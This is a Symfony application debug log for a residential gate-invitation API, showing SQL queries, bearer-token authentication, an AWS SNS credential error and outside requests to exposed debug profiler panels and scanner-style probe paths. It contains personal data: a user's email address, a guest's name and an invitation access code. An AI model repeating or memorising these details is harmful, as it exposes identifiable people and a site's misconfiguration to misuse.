[2025-12-18 00:19:07] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.status = ? [375,1] []
[2025-12-18 00:19:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [251] []
[2025-12-18 00:19:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
[2025-12-18 00:19:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [375,251] []
[2025-12-18 00:19:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.arn AS arn_7, t0.type AS type_8 FROM topic t0 WHERE t0.name = ? LIMIT 1 ["residential-7ff0f4e0-7d46- [...]"] []
[2025-12-18 00:19:07] request.CRITICAL: Uncaught PHP Exception Aws\Sns\Exception\SnsException: "Error executing "Subscribe" on "https://sns.us-east-1.amazonaws.com"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response: <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/"> <Error> <Type>Sender</Type> <Code>InvalidClie (truncated...) InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/"> <Error> <Type>Sender</Type> <Code>InvalidClientTokenId</Code> <Message>The security token included in the request is invalid.</Message> </Error> <RequestId>e6fec324-ec87-5f44-b313-a299a63cf2e1</RequestId> </ErrorResponse> " at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php line 195 {"exception":"[object] (Aws\\Sns\\Exception\\SnsException(code: 0): Error executing \"Subscribe\" on \"https://sns.us-east-1.amazonaws.com\"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n <Error>\n <Type>Sender</Type>\n <Code>InvalidClie (truncated...)\n InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n <Error>\n <Type>Sender</Type>\n <Code>InvalidClientTokenId</Code>\n <Message>The security token included in the request is invalid.</Message>\n </Error>\n <RequestId>e6fec324-ec87-5f44-b313-a299a63cf2e1</RequestId>\n</ErrorResponse>\n at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php:195, GuzzleHttp\\Exception\\ClientException(code: 403): Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n <Error>\n <Type>Sender</Type>\n <Code>InvalidClie (truncated...)\n at /var/repositories/hona/vendor/guzzlehttp/guzzle/src/Exception/RequestException.php:113)"} []
[2025-12-18 00:19:07] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-18 00:19:08] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-18 00:19:11] request.INFO: Matched route "residential_get_uuid_providers". {"route":"residential_get_uuid_providers","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\ResidentialController::residentialProvidersGETAction","domain":"api.unda.co","uuid":"a725d03d-0217-4179-9082-5a05b0a9293e","_route":"residential_get_uuid_providers"},"request_uri":"https://api.unda.co/residential/a725d03d-0217-4179-9082-5a05b0a9293e/providers","method":"GET"} []
[2025-12-18 00:19:11] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-18 00:19:11] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["85f7a45a7f902076a7dd71f507 [...]"] []
[2025-12-18 00:19:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
[2025-12-18 00:19:11] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosmurillosemerena@hotmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-18 00:19:11] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-18 00:19:11] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-18 00:19:11] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:19:11] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:19:11] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:19:11] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["85f7a45a7f902076a7dd71f507 [...]"] []
[2025-12-18 00:19:11] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
[2025-12-18 00:19:11] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosmurillosemerena@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:19:11] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:19:11] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:19:11] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-18 00:20:00] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
[2025-12-18 00:20:00] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-18 00:20:00] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["85f7a45a7f902076a7dd71f507 [...]"] []
[2025-12-18 00:20:00] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
[2025-12-18 00:20:00] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosmurillosemerena@hotmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-18 00:20:00] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-18 00:20:00] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-18 00:20:00] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:20:00] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:20:00] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:20:00] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["85f7a45a7f902076a7dd71f507 [...]"] []
[2025-12-18 00:20:00] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
[2025-12-18 00:20:00] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosmurillosemerena@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:20:00] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:20:00] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:20:00] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a725d03d-0217-4179-9082-5a [...]"] []
[2025-12-18 00:20:00] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [375,251,1] []
[2025-12-18 00:20:00] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["586cd940-fe5c-40f9-b203-99 [...]"] []
[2025-12-18 00:20:00] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a725d03d-0217-4179-9082-5a [...]"] []
[2025-12-18 00:20:00] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [375,251,1] []
[2025-12-18 00:20:00] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-18 00:20:00] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"f6bf3351-2f5f-440b-87ea-2b [...]","2":1,"3":"2025-12-18 00:20:00","4":"2025-12-18 00:20:00","5":"Gilberto","6":"Cespedes","7":"651499","8":"/invitation/688c833d65a452 [...]","9":"2","10":"1","11":"2025-12-18 14:00:00","12":null,"13":null,"14":null,"15":251,"16":375} []
[2025-12-18 00:20:00] doctrine.DEBUG: "COMMIT" [] []
[2025-12-18 00:20:00] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
[2025-12-18 00:20:00] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [251] []
[2025-12-18 00:20:00] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-18 00:20:01] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"a725d03d-0217-4179-9082-5a05b0a9293e","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/a725d03d-0217-4179-9082-5a05b0a9293e/invitation/20/0?order=desc","method":"GET"} []
[2025-12-18 00:20:01] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-18 00:20:01] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["85f7a45a7f902076a7dd71f507 [...]"] []
[2025-12-18 00:20:01] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
[2025-12-18 00:20:01] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosmurillosemerena@hotmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-18 00:20:01] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-18 00:20:01] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-18 00:20:01] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:20:01] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:20:01] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:20:01] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["85f7a45a7f902076a7dd71f507 [...]"] []
[2025-12-18 00:20:01] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
[2025-12-18 00:20:01] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosmurillosemerena@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:20:01] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:20:01] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:20:01] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a725d03d-0217-4179-9082-5a [...]"] []
[2025-12-18 00:20:01] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [375,251,1] []
[2025-12-18 00:20:01] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a725d03d-0217-4179-9082-5a [...]"] []
[2025-12-18 00:20:01] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
[2025-12-18 00:20:01] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [251,1] []
[2025-12-18 00:20:01] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [251,1] []
[2025-12-18 00:20:01] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
[2025-12-18 00:20:01] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [417] []
[2025-12-18 00:20:01] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-18 00:24:03] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-18 00:24:06] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-18 00:25:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?panel=security","method":"GET"} []
[2025-12-18 00:25:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-18 00:27:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /geoserver/web/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /geoserver/web/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 00:28:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 00:34:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c86f8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c86f8?panel=security","method":"GET"} []
[2025-12-18 00:34:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-18 00:39:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"243cd0","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/243cd0?panel=config","method":"GET"} []
[2025-12-18 00:39:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-18 00:43:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/latest?panel=db","method":"GET"} []
[2025-12-18 00:43:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-18 00:50:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ac77e0","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ac77e0?panel=dump","method":"GET"} []
[2025-12-18 00:50:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-18 00:59:15] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-18 01:14:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c7bb2b","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/c7bb2b?panel=logger","method":"GET"} []
[2025-12-18 01:14:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-18 01:19:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a42ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a42ca9?panel=dump","method":"GET"} []
[2025-12-18 01:19:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
